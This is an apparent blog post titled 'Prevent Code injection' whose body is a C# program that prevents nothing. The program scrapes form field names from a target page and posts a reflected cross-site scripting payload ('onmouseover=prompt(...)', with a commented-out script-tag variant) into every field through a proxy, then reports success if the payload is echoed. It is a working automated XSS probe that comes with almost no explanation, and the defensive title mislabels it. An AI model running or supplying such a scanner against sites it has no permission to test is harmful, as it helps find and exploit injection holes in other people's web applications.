Wednesday, November 16, 2011

Prevent Code injection

using System;
using System.Collections;
using System.Collections.Generic;
using System.IO;
using System.Text;
using System.Net;
using System.Net.Sockets;

namespace sqlInjection
{
class Program
{
private static string proxy = "";
private static string port = "";
private static string user = @"";
private static string pass = "";


private static void SearchComponents(string htmlContent, string component, List httpControls)
{
bool finish = false;
int positionComponent = 0;
int positionName = 0;
int positionCurrent = 0;
int position = 0;
int positionEqual = 0;
bool beginName = false;
string finishCharacter = " ";

while (finish != true)
{
positionComponent = htmlContent.IndexOf(component,positionCurrent);
if (positionComponent > 0)
{
positionCurrent = positionComponent + 3;
positionName = htmlContent.IndexOf("name", positionCurrent);
position = positionName + 4;
string componentName = "";
bool finishName = false;
finishCharacter = " ";
positionEqual = 0;
beginName = false;

while (!finishName)
{
if (positionEqual == 0)
{
if (htmlContent.Substring(position, 1) == "=")
{
positionEqual = 1;
}
}
else
{
if (beginName == false)
{
if (htmlContent.Substring(position, 1) == " " || htmlContent.Substring(position, 1) == "'" || htmlContent.Substring(position, 1) == "\"")
{
beginName = false;
}
else
{
beginName = true;
componentName = htmlContent.Substring(position, 1);
}
}
else
{

if (htmlContent.Substring(position, 1) == " " || htmlContent.Substring(position, 1) == "'" || htmlContent.Substring(position, 1) == "\"")
{
finishName = true;
}
else
componentName += htmlContent.Substring(position, 1);
}
}

position++;

}
httpControls.Add(componentName);
//httpControls.Add(httmlContent.Substring(componentName, 30));
}
else
{
finish = true;
}


}
}

static void Main(string[] args)
{
string link = "http://site.com";



/*
string injection = "1%3cScRiPt%20%3eprompt%28944524%29%3c%2fScRiPt%3e";
string injectionVerif = "prompt(";
*/
string injection = @"%22onmouseover=prompt(963103)%3E";
string injectionVerif = "onmouseover=prompt(";

WebRequest request = WebRequest.Create(link);
request.Method = "POST";
request.Proxy = new WebProxy(proxy, int.Parse(port));
request.Proxy.Credentials = new NetworkCredential(user,pass);

string postData = "";
byte[] byteArray = Encoding.UTF8.GetBytes(postData);
request.ContentType = "application/x-www-form-urlencoded";
request.ContentLength = byteArray.Length;

Stream dataStream = request.GetRequestStream();
dataStream.Write(byteArray, 0, byteArray.Length);
dataStream.Close();
WebResponse response = request.GetResponse();
Console.WriteLine(((HttpWebResponse)response).StatusDescription);
dataStream = response.GetResponseStream();
StreamReader reader = new StreamReader(dataStream);
string httmlContent = reader.ReadToEnd();
reader.Close();
dataStream.Close();
response.Close();

string searchComponent = "";
List listHTMLComponents = new List();
listHTMLComponents.Add("< select"); listHTMLComponents.Add("< input"); List httpControls = new List();


for (int i = 0; i < listHTMLComponents.Count; i++)
{
searchComponent = listHTMLComponents[i].ToString();
SearchComponents(httmlContent, searchComponent, httpControls);
}


for (int i = 0; i < httpControls.Count; i++)
{

postData += httpControls[i] + "=" + injection + "&";

}

request = WebRequest.Create(link);
request.Method = "POST";
byteArray = Encoding.UTF8.GetBytes(postData);
request.ContentType = "application/x-www-form-urlencoded";
request.ContentLength = byteArray.Length;
request.Proxy = new WebProxy(proxy, int.Parse(port));
request.Proxy.Credentials = new NetworkCredential(user,pass);

dataStream = request.GetRequestStream();
dataStream.Write(byteArray, 0, byteArray.Length);
dataStream.Close();
response = request.GetResponse();
dataStream = response.GetResponseStream();
reader = new StreamReader(dataStream);
httmlContent = reader.ReadToEnd();
reader.Close();
dataStream.Close();
response.Close();

if (httmlContent.Contains(injectionVerif))
{
Console.WriteLine("Injection ");
}

}



}

}

No comments:

Post a Comment